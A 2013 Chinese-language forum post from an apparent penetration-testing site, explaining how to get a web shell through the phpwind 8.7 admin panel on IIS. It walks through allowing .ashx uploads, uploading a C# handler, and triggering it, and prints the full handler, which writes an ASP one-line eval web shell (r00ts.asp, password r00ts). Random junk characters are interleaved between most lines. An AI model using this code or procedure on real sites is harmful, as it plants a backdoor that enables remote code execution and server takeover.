中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
2 F1 Y. h; D& t. X1 d" G
+ k) ]& D7 C. }7 n2 Q' x$ Q. [! ?
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
: ^6 V9 b0 K+ Y! \% W l/ y! J
& y) Y/ S+ s7 k8 \+ i; k, o# V
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
+ C" [4 X8 [; R% t
! H( s; ]! O0 s8 m e
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
; C- i& g' b1 r) o5 v
+ {& C7 T: R4 H- p9 G# \/ V: u( }
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
/ `8 V' z) f5 ^ ?% G3 W
, F3 ]- Q; w7 }0 d D! @
下面是代码:
, j; R9 ]" i) A( {& u
0 ` P4 l2 ^ @( E. x% Z* b* B
<%@ WebHandler Language="C#"Class="Handler" %>
+ j: F: t* k9 C/ @& S% O6 S
using System;
$ l8 C, a6 g' A+ u" T6 C& L
using System.Web;
: P1 ?7 b5 l) u3 H+ W+ d
using System.IO;
4 D- U/ _5 Y' i- Z# b
public class Handler : IHttpHandler {
1 {, h" l/ b2 [' q
public void ProcessRequest (HttpContext context) {
7 ]- W+ ~2 h- v0 X. M) x2 z0 q5 Z
context.Response.ContentType = "text/plain";
- K& w1 P3 e7 ?3 {
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
6 H" s* l8 M7 p$ x, e
file1.Write("<%eval request(\"r00ts\")%>");
. P8 v+ @8 R. B* g* F
file1.Flush();
+ U, C. n9 k, p0 [+ R
file1.Close();
8 k+ y' k; ?9 k3 y5 X% \: `2 q
}
% h0 y3 t* K( c6 l
public bool IsReusable {
4 v/ G0 T' R1 ~2 P
get {
3 ?0 t, V$ T) o
return false;
6 f6 n# j0 D% B/ {0 ]
}
& ]3 V V$ {3 v& o
}
- S- l- h% H& i; J, c$ W4 f
}
$ n* T$ ~0 }; h4 O4 M/ z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2